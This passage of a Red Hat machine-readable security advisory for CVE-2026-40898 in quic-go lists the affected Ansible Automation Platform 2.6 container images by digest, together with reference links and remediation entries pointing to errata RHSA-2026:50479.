"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-40898"
},
{
"category": "external",
"summary": "RHBZ#2484875",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2484875"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-40898",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-40898"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-40898",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40898"
},
{
"category": "external",
"summary": "https://github.com/quic-go/quic-go/releases/tag/v0.59.1",
"url": "https://github.com/quic-go/quic-go/releases/tag/v0.59.1"
},
{
"category": "external",
"summary": "https://github.com/quic-go/quic-go/security/advisories/GHSA-vvgj-x9jq-8cj9",
"url": "https://github.com/quic-go/quic-go/security/advisories/GHSA-vvgj-x9jq-8cj9"
}
],
"release_date": "2026-06-04T17:43:36.803000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T21:39:16+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50479"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
